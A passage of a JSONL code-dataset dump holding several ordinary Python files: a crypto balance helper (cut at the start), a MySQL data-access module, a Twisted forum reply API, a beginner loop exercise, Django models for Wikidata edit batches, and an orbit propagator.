'{:.8f}'.format(float(quantity))\n\t\t\t\taccount = account.append({'coin':item,'quantity':quantity,'last':last,'BTC value':value}, ignore_index=True)\n\ttotal = pd.to_numeric(account['BTC value'])\n\ttotal_btc = total.sum()\n\ttotal_btc = '{:.8f}'.format(total_btc*0.975)\n\treturn account, total_btc\n\ndef getbittrexbalance():\n\tbalance = p.get_balances()\n\tbalance = balance['result']\n\tcolumn_headers = ['coin','quantity','last','BTC value']\n\taccount = pd.DataFrame(columns=column_headers)\n\tfor item in balance:\n\t\tif item['Balance'] > 0.0:\n\t\t\tbalance = '{:.8f}'.format(item['Balance'])\n\t\t\tcoin = item['Currency']\n\t\t\tif 'BTC' in coin:\n\t\t\t\tlast = float(item['Balance'])\n\t\t\t\tvalue = float(item['Balance'])\n\t\t\t\tvalue = '{:.8f}'.format(value)\n\t\t\t\tlast = '{:.8f}'.format(last)\n\t\t\t\taccount = account.append({'coin':item['Currency'],'quantity':balance,'last':last,'BTC value':value}, ignore_index=True)\n\t\t\tif 'BTC' not in coin:\n\t\t\t\tcoin = coin.replace(coin,'BTC-%s'%(coin))\n\t\t\tmarket = p.get_marketsummary(coin)\n\t\t\t#print(market)\n\t\t\tif market['success'] == True:\n\t\t\t\tlast = market['result']\n\t\t\t\tlast = last[0]['Last']\n\t\t\t\tvalue = float(last)*float(balance)\n\t\t\t\tvalue = '{:.8f}'.format(value)\n\t\t\t\tlast = '{:.8f}'.format(last)\n\t\t\t\taccount = account.append({'coin':item['Currency'],'quantity':balance,'last':last,'BTC value':value}, ignore_index=True)\n\ttotal = pd.to_numeric(account['BTC value'])\n\ttotal_btc = total.sum()\n\ttotal_btc = '{:.8f}'.format(total_btc*0.975)\n\treturn account, total_btc\n","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":3385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"286013115","text":"import MySQLdb.cursors\n\nclass VoteDemographicValue:\n def __init__(self, votedemographicvalue_id, votedemographic_id, value_name, display_index):\n self.votedemographicvalue_id = votedemographicvalue_id\n self.votedemographic_id = votedemographic_id\n self.value_name = value_name\n self.display_index = display_index\n\ndef create(db, votedemographic_id, value_name, display_index):\n query_str = 'INSERT INTO {0} ({1}, {2}, {3}) values (%s, %s, %s)'.format(TABLE_NAME, FIELD_VOTEDEMOGRAPHICID, FIELD_VALUENAME, FIELD_DISPLAYINDEX)\n curs = db.cursor()\n curs.execute(query_str, [votedemographic_id, value_name, display_index])\n votedemographicvalue_id = curs.lastrowid\n db.commit()\n return VoteDemographicValue(votedemographicvalue_id, votedemographic_id, value_name, display_index)\n\ndef delete_by_x(db, field, x):\n query_str = 'DELETE FROM {0} WHERE {1}=%s'.format(TABLE_NAME, field)\n db.cursor().execute(query_str, [x])\n db.commit()\n\ndef delete(db, votedemographicvalue_id):\n delete_by_x(db, FIELD_VOTEDEMOGRAPHICVALUEID, votedemographicvalue_id)\n\ndef delete_all_for_votedemographic(db, votedemographic_id):\n delete_by_x(db, FIELD_VOTEDEMOGRAPHICID, votedemographic_id)\n\ndef get_all_by_x(db, field, x):\n query_str = 'SELECT {0}, {1}, {2}, {3} FROM {4} WHERE {5}=%s'.format(FIELD_VOTEDEMOGRAPHICVALUEID, FIELD_VOTEDEMOGRAPHICID, FIELD_VALUENAME, FIELD_DISPLAYINDEX, TABLE_NAME, field)\n cur = db.cursor()\n cur.execute(query_str, [x])\n entries = [VoteDemographicValue(row[0], row[1], row[2], row[3]) for row in cur.fetchall()]\n return entries\n\n##################\n# DB Definitions #\n##################\nTABLE_NAME = 'votedemographicvalues'\nFIELD_VOTEDEMOGRAPHICVALUEID = 'votedemographicvalue_id'\nFIELD_VOTEDEMOGRAPHICID = 'votedemographic_id'\nFIELD_VALUENAME = 'value_name'\nFIELD_DISPLAYINDEX = 'display_index'\n","sub_path":"ru_votedemographicvalue.py","file_name":"ru_votedemographicvalue.py","file_ext":"py","file_size_in_byte":1880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"74781657","text":"# -*- coding: utf-8 -*-\nfrom datetime import datetime\nimport json\n\nfrom twisted.web.http import NOT_FOUND, UNAUTHORIZED\nfrom sqlalchemy.orm import subqueryload\n\nfrom exception import BadArgument\nfrom helper.resource import YuzukiResource\nfrom model.article import Article\nfrom model.reply import Reply\nfrom model.reply_record import ReplyRecord\nfrom config import REPLY_PER_PAGE\n\n\nclass ReplyParent(YuzukiResource):\n isLeaf = False\n\n def __init__(self):\n YuzukiResource.__init__(self)\n self.putChild(\"view\", ReplyView())\n self.putChild(\"write\", ReplyWrite())\n self.putChild(\"delete\", ReplyDelete())\n self.putChild(\"edit\", ReplyEdit())\n\n\nclass ReplyView(YuzukiResource):\n _REPLY_PER_PAGE = REPLY_PER_PAGE\n\n def render_GET(self, request):\n article_id = request.get_argument(\"article_id\")\n try:\n page = int(request.get_argument(\"page\", \"1\"))\n except ValueError:\n raise BadArgument(\"page\", request.get_argument(\"page\"))\n query = request.dbsession.query(Article) \\\n .filter(Article.uid == article_id) \\\n .filter(Article.enabled == True) \\\n .options(subqueryload(Article.board))\n result = query.all()\n if not result:\n request.setResponseCode(NOT_FOUND)\n return \"article not found\"\n article = result[0]\n if article.board.name == \"notice\" or (\n request.user and any([group.name == \"anybody\" for group in request.user.groups])):\n query = request.dbsession.query(Reply) \\\n .filter(Reply.article == article) \\\n .filter(Reply.enabled == True) \\\n .order_by(Reply.uid.desc()) \\\n .options(subqueryload(Reply.user))\n start_idx = self._REPLY_PER_PAGE * (page - 1)\n end_idx = start_idx + self._REPLY_PER_PAGE\n result = query[start_idx:end_idx]\n return json.dumps([reply.to_dict() for reply in result])\n else:\n request.setResponseCode(UNAUTHORIZED)\n return \"unauthorized\"\n\n\nclass ReplyWrite(YuzukiResource):\n def render_POST(self, request):\n article_id = request.get_argument(\"article_id\")\n query = request.dbsession.query(Article) \\\n .filter(Article.uid == article_id) \\\n .filter(Article.enabled == True) \\\n .options(subqueryload(Article.board))\n result = query.all()\n if not result:\n request.setResponseCode(NOT_FOUND)\n return self.generate_error_message(request,\n NOT_FOUND,\n \"Not Found\",\n u\"게시글이 존재하지 않습니다.\")\n article = result[0]\n if request.user and request.user in article.board.comment_group.users:\n content = request.get_argument(\"content\")\n # no empty reply\n if content.strip():\n reply = Reply(article, request.user, content)\n request.dbsession.add(reply)\n article.reply_count += 1\n request.dbsession.commit()\n page = request.get_argument(\"page\", None)\n redirect = \"/article/view?id=%s\" % article.uid\n if page:\n redirect += \"&page=%s\" % page\n request.redirect(redirect)\n return \"success\"\n else:\n raise BadArgument(\"content\", \"empty\")\n else:\n request.setResponseCode(UNAUTHORIZED)\n return self.generate_error_message(request,\n UNAUTHORIZED,\n \"Unauthorized\",\n u\"댓글을 쓸 권한이 없습니다.\")\n\n\nclass ReplyDelete(YuzukiResource):\n def render_DELETE(self, request):\n reply_id = request.get_argument(\"id\")\n query = request.dbsession.query(Reply) \\\n .filter(Reply.uid == reply_id) \\\n .filter(Reply.enabled == True) \\\n .options(subqueryload(Reply.user))\n result = query.all()\n if not result:\n request.setResponseCode(NOT_FOUND)\n return \"reply not found\"\n reply = result[0]\n if request.user and (request.user == reply.user or request.user.is_admin):\n reply.enabled = False\n reply.deleted_at = datetime.now()\n reply.deleted_user = request.user\n reply.article.reply_count -= 1\n request.dbsession.commit()\n return \"success\"\n else:\n request.setResponseCode(UNAUTHORIZED)\n return \"unauthorized\"\n\n\nclass ReplyEdit(YuzukiResource):\n def render_POST(self, request):\n reply_id = request.get_argument(\"id\")\n query = request.dbsession.query(Reply) \\\n .filter(Reply.uid == reply_id) \\\n .filter(Reply.enabled == True) \\\n .options(subqueryload(Reply.user))\n result = query.all()\n if not result:\n request.setResponseCode(NOT_FOUND)\n return \"reply not found\"\n reply = result[0]\n if request.user and request.user == reply.user:\n content = request.get_argument(\"content\")\n if content.strip():\n reply_record = ReplyRecord(reply)\n reply.content = content\n request.dbsession.add(reply_record)\n request.dbsession.commit()\n return \"reply edit success\"\n else:\n raise BadArgument(\"content\", \"empty\")\n else:\n request.setResponseCode(UNAUTHORIZED)\n return \"unauthorized\"","sub_path":"resource/reply.py","file_name":"reply.py","file_ext":"py","file_size_in_byte":5767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"612017801","text":"\"\"\" Escreva um programa que escreva na tela de 1 até 100, de 1 em 1, 2 vezes. A primeira deve ser usando a estrutura for,\na segunda utilizando while.\"\"\"\n# Com for\nfor contador in range(1, 101):\n print(contador)\nnumero = 1\n# Com While\nwhile numero != 101:\n print(numero)\n numero = numero + 1\n","sub_path":"Seção 6 - Estruturas de repetição/ex002.py","file_name":"ex002.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"231257353","text":"from django.conf import settings\nfrom django.db import models\nfrom django.db import transaction\nfrom django.db.utils import IntegrityError\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.urls import reverse\nfrom django_bulk_update.manager import BulkUpdateManager\nfrom caching.base import CachingManager, CachingMixin\nfrom collections import namedtuple\nfrom cached_property import cached_property\nfrom collections import defaultdict\n\nimport re\nimport json\nfrom pytz import UTC\nfrom datetime import datetime\nfrom .utils import grouper\n\nMAX_CHARFIELD_LENGTH = 190\n\nclass Tool(CachingMixin, models.Model):\n \"\"\"\n A tool, making edits with some ids in the edit summaries\n \"\"\"\n objects = CachingManager()\n\n Match = namedtuple('Match', 'uid user summary')\n\n name = models.CharField(max_length=MAX_CHARFIELD_LENGTH)\n shortid = models.CharField(max_length=32)\n\n idregex = models.CharField(max_length=MAX_CHARFIELD_LENGTH)\n idgroupid = models.IntegerField()\n\n summaryregex = models.CharField(max_length=MAX_CHARFIELD_LENGTH)\n summarygroupid = models.IntegerField()\n\n userregex = models.CharField(max_length=MAX_CHARFIELD_LENGTH, null=True, blank=True)\n usergroupid = models.IntegerField(null=True, blank=True)\n\n url = models.URLField()\n\n class Meta(object):\n base_manager_name = 'objects'\n\n def __str__(self):\n return self.name\n\n def match(self, user, comment):\n \"\"\"\n Determines if an edit made with the supplied comment\n came from that tool, based on string matching with\n the supplied regular expressions.\n\n :returns: a Match named tuple if there\n is a match, None otherwise\n \"\"\"\n idre = re.compile(self.idregex)\n idmatch = idre.match(comment)\n summaryre = re.compile(self.summaryregex)\n summarymatch = summaryre.match(comment)\n\n if not idmatch:\n return\n\n uid = idmatch.group(self.idgroupid)\n if not uid:\n return\n summary = ''\n if summarymatch:\n summary = summarymatch.group(self.summarygroupid)\n\n realuser = user\n if self.userregex:\n userre = re.compile(self.userregex)\n usermatch = userre.match(comment)\n if usermatch and usermatch.group(self.usergroupid):\n realuser = usermatch.group(self.usergroupid)\n\n return self.Match(uid=uid, user=realuser, summary=summary)\n\n @cached_property\n def nb_batches(self):\n return self.batch_set.count()\n\n @cached_property\n def nb_unique_users(self):\n return self.batch_set.values('user').distinct().count()\n\nclass BatchManager(BulkUpdateManager):\n \"\"\"\n This makes Batch methods available in migrations.\n \"\"\"\n use_in_migrations = True\n\nclass Batch(models.Model):\n \"\"\"\n A group of edits\n \"\"\"\n objects = BatchManager()\n\n tool = models.ForeignKey(Tool, on_delete=models.CASCADE)\n user = models.CharField(max_length=MAX_CHARFIELD_LENGTH, db_index=True, blank=False)\n uid = models.CharField(max_length=MAX_CHARFIELD_LENGTH, db_index=True, blank=False)\n\n summary = models.CharField(max_length=MAX_CHARFIELD_LENGTH)\n started = models.DateTimeField()\n ended = models.DateTimeField(db_index=True)\n nb_edits = models.IntegerField()\n nb_distinct_pages = models.IntegerField()\n nb_reverted_edits = models.IntegerField()\n nb_new_pages = models.IntegerField()\n total_diffsize = models.BigIntegerField()\n\n archived = models.BooleanField(default=False)\n\n # Internal field to keep track of when a batch was last modified.\n # In general this will not be equal to 'ended' as we can ingest\n # batches retrospectively after they ended.\n last_modified = models.DateTimeField(auto_now=True)\n\n class Meta:\n unique_together = (('tool','uid','user'))\n\n def __str__(self):\n return ''.format(self.tool.shortid, self.uid, self.user)\n\n @property\n def full_uid(self):\n return self.tool.shortid+'/'+self.uid\n\n @property\n def editing_speed(self):\n time_diff = self.duration\n if time_diff <= 0:\n return '∞'\n return '{:5.1f}'.format((self.nb_edits * 60.)/time_diff).strip()\n\n @property\n def entities_speed(self):\n time_diff = self.duration\n if time_diff <= 0:\n return '∞'\n return '{:5.1f}'.format((self.nb_pages * 60.)/time_diff).strip()\n\n @cached_property\n def duration(self):\n return (self.ended - self.started).total_seconds()\n\n @property\n def nb_reverted(self):\n return self.nb_reverted_edits\n\n @cached_property\n def revertable_edits(self):\n return self.edits.filter(reverted=False)\n\n @cached_property\n def active_revert_task(self):\n try:\n return self.revert_tasks.filter(cancel=False,complete=False).get()\n except ObjectDoesNotExist:\n return None\n\n @property\n def can_be_reverted(self):\n return (self.nb_revertable_edits > 0 and\n self.active_revert_task is None and\n not self.archived)\n\n @cached_property\n def nb_revertable_edits(self):\n return self.nb_edits - self.nb_reverted_edits\n\n @cached_property\n def nb_pages(self):\n # used to be: self.edits.all().values('title').distinct().count()\n # but that is too expensive when the batches get large, so we cache this:\n return self.nb_distinct_pages\n\n @cached_property\n def nb_undeleted_new_pages(self):\n return self.revertable_edits.filter(changetype__in=['new','restore','delete']).count()\n\n @property\n def nb_existing_pages(self):\n return self.nb_pages - self.nb_new_pages\n\n @property\n def avg_diffsize(self):\n if self.nb_edits:\n return self.total_diffsize / self.nb_edits\n return 0\n\n @property\n def url(self):\n return reverse('batch-view', args=[self.tool.shortid, self.uid])\n\n @property\n def csv_url(self):\n return reverse('csv-batch-edits', args=[self.tool.shortid, self.uid])\n\n @cached_property\n def tag_ids(self):\n return self.sorted_tags.values_list('id', flat=True)\n\n @cached_property\n def sorted_tags(self):\n return self.tags.order_by('-priority', 'id')\n\n @cached_property\n def reverting_batches(self):\n \"\"\"\n Returns the list of batches which revert this batch\n \"\"\"\n uids = self.revert_tasks.values_list('uid', flat=True)\n return Batch.objects.filter(uid__in=uids)\n\n @cached_property\n def reverted_batch(self):\n \"\"\"\n Returns the batch reverted by this batch, if any (None otherwise).\n \"\"\"\n try:\n return Batch.objects.get(revert_tasks__uid=self.uid)\n except Batch.DoesNotExist:\n return None\n\n def recompute_cached_stats(self):\n \"\"\"\n Recomputes all the cached stats from the edits.\n This is expensive to do - it should only done if things have gone wrong.\n\n This does not save the Batch object yet.\n \"\"\"\n # Refuse to do this if the batch is archived, as this will yield incorrect results\n if self.archived:\n return\n\n self.nb_edits = self.edits.count()\n self.nb_distinct_pages = self.edits.all().values('title').distinct().count()\n self.nb_reverted_edits = self.edits.all().filter(reverted=True).count()\n self.nb_new_pages = self.edits.all().filter(changetype='new').count()\n self.total_diffsize = self.edits.all().aggregate(total_diff=models.Sum('newlength')-models.Sum('oldlength')).get('total_diff')\n\n def archive(self, batch_inspector):\n \"\"\"\n Recomputes all cached statistics from the edits, computes tags again,\n and then deletes all edits in the batch except the last few ones.\n\n This marks the batch as archived.\n \"\"\"\n if self.archived:\n return\n\n # First, make sure we have up-to-date batch statistics and tags\n self.recompute_cached_stats()\n batch_inspector.add_missing_tags(self)\n\n # Then, archive the batch\n if self.nb_edits > settings.EDITS_KEPT_AFTER_ARCHIVAL:\n self.archived = True\n self.save()\n first_revid = self.edits.order_by('-newrevid')[settings.EDITS_KEPT_AFTER_ARCHIVAL-1].newrevid\n self.edits.filter(newrevid__lt=first_revid).delete()\n\n @classmethod\n def archive_old_batches(cls, batch_inspector):\n \"\"\"\n Archive all batches which have not been modified for a long time\n and contain more edits than our archival threshold.\n\n This method is meant to be run periodically.\n \"\"\"\n cutoff_date = datetime.utcnow().replace(tzinfo=UTC) - settings.BATCH_ARCHIVAL_DELAY\n for batch in cls.objects.filter(nb_edits__gt=settings.EDITS_KEPT_AFTER_ARCHIVAL, archived=False, ended__lt=cutoff_date):\n batch.archive(batch_inspector)\n\nfrom tagging.models import Tag\n\nclass Edit(models.Model):\n \"\"\"\n A MediaWiki edit as returned by the Event Stream API\n \"\"\"\n id = models.BigIntegerField(unique=True, primary_key=True)\n oldrevid = models.BigIntegerField(null=True)\n newrevid = models.BigIntegerField()\n oldlength = models.IntegerField()\n newlength = models.IntegerField()\n timestamp = models.DateTimeField(db_index=True)\n title = models.CharField(max_length=MAX_CHARFIELD_LENGTH, db_index=True)\n namespace = models.IntegerField()\n uri = models.CharField(max_length=MAX_CHARFIELD_LENGTH)\n comment = models.TextField()\n parsedcomment = models.TextField()\n bot = models.BooleanField()\n minor = models.BooleanField()\n changetype = models.CharField(max_length=32)\n user = models.CharField(max_length=MAX_CHARFIELD_LENGTH)\n patrolled = models.BooleanField()\n\n # Inferred by us\n batch = models.ForeignKey(Batch, on_delete=models.CASCADE, related_name='edits')\n reverted = models.BooleanField(default=False)\n\n class Meta:\n indexes = [\n models.Index(fields=['batch', 'newrevid'])\n ]\n\n reverted_re = re.compile(r'^/\\* undo:0\\|\\|(\\d+)\\|')\n\n @property\n def url(self):\n return '{}?diff={}&oldid={}'.format(settings.MEDIAWIKI_INDEX_ENDPOINT, self.newrevid, self.oldrevid)\n\n @property\n def revert_url(self):\n if self.oldrevid:\n return '{}?title={}&action=edit&undoafter={}&undo={}'.format(settings.MEDIAWIKI_INDEX_ENDPOINT, self.title, self.oldrevid, self.newrevid)\n elif self.changetype == 'delete':\n return '{}Special:Undelete/{}'.format(settings.MEDIAWIKI_BASE_URL, self.title)\n else:\n return '{}?title={}&action=delete'.format(settings.MEDIAWIKI_INDEX_ENDPOINT, self.title)\n\n def __str__(self):\n return ''.format(self.url)\n\n @classmethod\n def from_json(cls, json_edit, batch):\n \"\"\"\n Creates an edit from json, without saving it\n \"\"\"\n # The following two fields are not provided in deletions\n revision = json_edit.get('revision', {})\n length = json_edit.get('length', {})\n changetype = json_edit['type']\n if changetype == 'log':\n changetype = json_edit['log_action']\n\n return cls(\n id = json_edit['id'],\n oldrevid = revision.get('old') or 0,\n newrevid = revision.get('new') or 0,\n oldlength = length.get('old') or 0,\n newlength = length.get('new') or 0,\n timestamp = datetime.fromtimestamp(json_edit['timestamp'], tz=UTC),\n title = json_edit['title'][:MAX_CHARFIELD_LENGTH],\n namespace = json_edit['namespace'],\n uri = json_edit['meta']['uri'][:MAX_CHARFIELD_LENGTH],\n comment = json_edit['comment'],\n parsedcomment = json_edit['parsedcomment'],\n bot = json_edit['bot'],\n minor = json_edit.get('minor') or False,\n changetype = changetype,\n user = json_edit['user'][:MAX_CHARFIELD_LENGTH],\n patrolled = json_edit.get('patrolled') or False,\n batch = batch,\n reverted = False)\n\n @classmethod\n def ingest_edits(cls, json_batch):\n # Map from (toolid, uid, user) to Batch object\n batches = {}\n model_edits = []\n reverted_ids = []\n deleted_pages = {} # map: title -> latest deletion timestamp\n restored_pages = {} # map: title -> latest restoration timestamp\n modified_pages = defaultdict(set) # map: batch_key -> set of touched pages\n new_tags = defaultdict(set)\n\n tools = Tool.objects.all()\n\n for edit_json in json_batch:\n if not edit_json or edit_json.get('namespace') not in settings.WATCHED_NAMESPACES:\n continue\n timestamp = datetime.fromtimestamp(edit_json['timestamp'], tz=UTC)\n\n # First, check if this is a revert\n revert_match = cls.reverted_re.match(edit_json['comment'])\n if revert_match:\n reverted_ids.append(int(revert_match.group(1)))\n\n # or a deletion\n if edit_json.get('log_action') == 'delete':\n deleted_pages[edit_json['title']] = timestamp\n\n # or a restore\n if edit_json.get('log_action') == 'restore':\n restored_pages[edit_json['title']] = timestamp\n\n # Then, try to match the edit with a tool\n match = None\n matching_tool = None\n for tool in tools:\n match = tool.match(edit_json['user'], edit_json['comment'])\n if match is not None:\n matching_tool = tool\n break\n\n if match is None:\n continue\n\n # Try to find an existing batch for that edit\n batch_key = (matching_tool.shortid, match.uid)\n batch = batches.get(batch_key)\n\n created = False\n if not batch:\n batch, created = Batch.objects.get_or_create(\n tool=tool, uid=match.uid,\n defaults={\n 'user': match.user[:MAX_CHARFIELD_LENGTH],\n 'summary': match.summary[:MAX_CHARFIELD_LENGTH],\n 'started': timestamp,\n 'ended': timestamp,\n 'nb_edits': 0,\n 'nb_distinct_pages': 0,\n 'nb_new_pages': 0,\n 'nb_reverted_edits': 0,\n 'total_diffsize': 0,\n })\n\n # Check that the batch is owned by the right user\n if batch.user != match.user:\n if created:\n batch.delete()\n continue\n\n batch.nb_edits += 1\n length_obj = edit_json.get('length') or {}\n batch.total_diffsize += (length_obj.get('new') or 0) - (length_obj.get('old') or 0)\n batch.ended = max(batch.ended, timestamp)\n\n batches[batch_key] = batch\n\n # Create the edit object\n model_edit = Edit.from_json(edit_json, batch)\n model_edits.append(model_edit)\n\n # Extract tags from the edit\n edit_tags = Tag.extract(model_edit)\n missing_tags = [tag.id for tag in edit_tags if tag.id not in batch.tag_ids]\n new_tags[batch.id].update(missing_tags)\n\n # Take note of the modified page, for computation of the number of entities edited by a batch\n modified_pages[batch_key].add(edit_json['title'])\n # And the number of new pages\n if model_edit.changetype == 'new':\n batch.nb_new_pages += 1\n\n # if we saw some deletions which match any creations or undeletions we know of, mark them as deleted.\n # We do this before creating the previous edits in the same batch, because deletions and restorations\n # do not come with unique ids to identify the creation, deletion or restoration that they undo\n # (this is a notion that we introduce ourselves) so if a deletion and the corresponding revert happen\n # in the same batch we need to inspect the order in which they happened.\n if deleted_pages:\n cls.mark_as_reverted(Edit.objects.filter(title__in=deleted_pages.keys(), changetype__in=['new','restore']))\n for edit in model_edits:\n if (edit.title in deleted_pages\n and edit.changetype in ['new','restore']\n and edit.timestamp < deleted_pages.get(edit.title)):\n edit.reverted = True\n edit.batch.nb_reverted_edits += 1\n # finally if we saw some undeletions which match any deletions we know of, mark them as undone\n if restored_pages:\n cls.mark_as_reverted(Edit.objects.filter(title__in=restored_pages.keys(), changetype='delete'))\n for edit in model_edits:\n if (edit.title in restored_pages\n and edit.changetype == 'delete'\n and edit.timestamp < restored_pages.get(edit.title)):\n edit.reverted = True\n edit.batch.nb_reverted_edits += 1\n\n # Create all Edit objects update all the batch objects\n if batches:\n # Update the number of modified pages\n for batch_key, pages in modified_pages.items():\n batch = batches.get(batch_key)\n existing_pages = set(batch.edits.filter(title__in=pages).values_list('title',flat=True))\n unseen_pages = pages-existing_pages\n batch.nb_distinct_pages += len(unseen_pages)\n\n # Create all the edit objects\n try:\n with transaction.atomic():\n Edit.objects.bulk_create(model_edits)\n except IntegrityError as e:\n # Oops! Some of them existed already!\n # Let's add them one by one instead.\n for edit in model_edits:\n try:\n existing_edit = Edit.objects.get(id=edit.id)\n # this edit was already seen: we need to remove it\n # from the associated batch count\n batch_key = (edit.batch.tool.shortid, edit.batch.uid)\n batch = batches.get(batch_key)\n if batch:\n batch.nb_edits -= 1\n batch.total_diffsize -= edit.newlength - edit.oldlength\n if edit.changetype == 'new':\n batch.nb_new_pages -= 1\n if edit.reverted:\n batch.nb_reverted_edits -= 1\n except Edit.DoesNotExist:\n edit.save()\n\n # update batch objects\n Batch.objects.bulk_update(list(batches.values()),\n update_fields=['ended', 'nb_edits', 'nb_distinct_pages',\n 'nb_reverted_edits', 'nb_new_pages', 'total_diffsize'])\n\n # update tags for batches\n if new_tags:\n Tag.add_tags_to_batches(new_tags)\n\n # If we saw any \"undo\" edit, mark all matching edits as reverted.\n # We do this after creating the latest edits because it could be possible that\n # an edit from the batch we just processed was undone in the same go.\n if reverted_ids:\n cls.mark_as_reverted(Edit.objects.filter(newrevid__in=reverted_ids))\n\n @classmethod\n def ingest_jsonlines(cls, fname, batch_size=50):\n\n def lines_generator():\n with open(fname, 'r') as f:\n for line in f:\n try:\n yield json.loads(line.strip())\n except ValueError:\n pass\n\n for batch in grouper(lines_generator(), batch_size, ):\n cls.ingest_edits(batch)\n\n @classmethod\n def mark_as_reverted(cls, qs):\n \"\"\"\n Given a queryset of edits, mark each edit object as reverted and update\n the batch-level statistics accordingly.\n \"\"\"\n nb_updated = qs.update(reverted=True)\n # there is probably a clever way to do this in SQL but there are generally\n # few reverts so this scales fine for now.\n if nb_updated:\n for edit in qs:\n b = edit.batch\n b.nb_reverted_edits += 1\n b.save(update_fields=['nb_reverted_edits'])\n\n @classmethod\n def latest_edit_time(cls):\n try:\n return Edit.objects.all().order_by('-timestamp').values_list('timestamp', flat=True)[0]\n except IndexError: # no edit in the database…\n return datetime.utcnow().replace(tzinfo=UTC)\n\n @classmethod\n def current_lag(cls):\n \"\"\"\n Returns the amount of time since the last edit successfully ingested.\n \"\"\"\n return datetime.utcnow().replace(tzinfo=UTC) - cls.latest_edit_time()\n","sub_path":"store/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":21122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"402123188","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.integrate import ode\n\nimport planetary_data as pd\nimport tools as t\n\ndef null_perts(): # no perturbations\n return {\n 'J2': False,\n 'aero': False,\n 'moon_grav': False,\n 'solar_gravity': False\n }\n\nclass OrbitPropagator:\n def __init__(self, state0, tspan, dt, coes=False, deg=True, cb=pd.earth, perts=null_perts()): # dt = timestep, cb = central body\n if coes:\n self.r0, self.v0, date = t.coes2rv(state0, deg=deg, mu=cb['mu'])\n else:\n self.r0 = state0[:3]\n self.v0 = state0[3:]\n\n self.y0 = list(self.r0) + list(self.v0)\n self.tspan = tspan\n self.dt = dt\n self.cb = cb\n\n # total number of steps\n self.n_steps = int(np.ceil(self.tspan / self.dt))\n\n # initialize variables\n self.ts = np.zeros((self.n_steps, 1))\n self.ys = np.zeros((self.n_steps, 6))\n self.ts[0] = 0\n self.ys[0,:] = self.y0\n self.step = 1\n\n # initiate solver\n self.solver = ode(self.diffy_q)\n self.solver.set_integrator('lsoda')\n self.solver.set_initial_value(self.y0, 0)\n\n # define perturbations dictionary\n self.perts = perts\n\n self.propagate_orbit()\n \n def propagate_orbit(self):\n # propagate orbit\n while self.solver.successful() and self.step < self.n_steps:\n self.solver.integrate(self.solver.t + self.dt)\n self.ts[self.step] = self.solver.t\n self.ys[self.step] = self.solver.y\n self.step += 1\n \n self.rs = self.ys[:,:3]\n self.vs = self.ys[:,3:]\n \n def diffy_q(self, t, y):\n # unpack state\n rx, ry, rz, vx, vy, vz = y\n r = np.array([rx, ry, rz])\n\n # norm of the radius vector\n norm_r = np.linalg.norm(r)\n\n # two body acceleration\n a = -r * self.cb['mu'] / norm_r**3\n\n # J2 perturbation\n if self.perts['J2']:\n z2 = r[2]**2\n r2 = norm_r**2\n tx = r[0] / norm_r * (5 * z2 / r2 - 1)\n ty = r[1] / norm_r * (5 * z2 / r2 - 1)\n tz = r[2] / norm_r * (5 * z2 / r2 - 3)\n\n a_j2 = 1.5 * self.cb['J2'] * self.cb['mu'] * self.cb['radius']**2 / norm_r**4 * np.array([tx,ty,tz])\n\n a += a_j2\n\n return [vx,vy,vz,a[0],a[1],a[2]]\n \n def calculate_coes(self, degrees=True):\n print('Calculating COEs...')\n\n self.coes = np.zeros((self.n_steps, 6))\n\n for n in range(self.n_steps):\n self.coes[n,:] = t.rv2coes(self.rs[n,:], self.vs[n,:], mu=self.cb['mu'], degrees=degrees)\n\n def plot_3d(self, show_plot=False, save_plot=False, title='Some Plot'):\n # 3D plot\n fig = plt.figure(figsize=(16,8))\n ax = fig.add_subplot(111, projection='3d')\n\n # plot trajectory and starting point\n ax.plot(self.rs[:,0], self.rs[:,1], self.rs[:,2], 'b', label='Trajectory')\n ax.plot([self.rs[0,0]], [self.rs[0,1]], [self.rs[0,2]], 'bo', label='Starting Position')\n\n # plot earth\n _u, _v = np.mgrid[0:2 * np.pi:20j, 0:np.pi:10j]\n _x = self.cb['radius'] * np.cos(_u) * np.sin(_v)\n _y = self.cb['radius'] * np.sin(_u) * np.sin(_v)\n _z = self.cb['radius'] * np.cos(_v)\n ax.plot_surface(_x, _y, _z, cmap='Greens')\n\n # plot X, Y, Z vectors (arrows)\n l = self.cb['radius'] * 2.0\n x, y, z = [[0,0,0], [0,0,0], [0,0,0]] # where arrows start\n u, v, w = [[l,0,0], [0,l,0], [0,0,l]] # where arrows end\n ax.quiver(x, y, z, u, v, w, color='y')\n\n # check for custom axes limits\n max_val = np.max(np.abs(self.rs))\n\n # set labels and title\n ax.set_xlim([-max_val, max_val])\n ax.set_ylim([-max_val, max_val])\n ax.set_zlim([-max_val, max_val])\n ax.set_xlabel('X (km)')\n ax.set_ylabel('Y (km)')\n ax.set_zlabel('Z (km)')\n ax.set_aspect('equal')\n \n ax.set_title(title)\n plt.legend()\n\n if show_plot:\n plt.show()\n if save_plot:\n plt.savefig(title.replace(\" \", \"_\") + '.png', dpi=300)","sub_path":"OrbitPropagatorKep.py","file_name":"OrbitPropagatorKep.py","file_ext":"py","file_size_in_byte":3758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
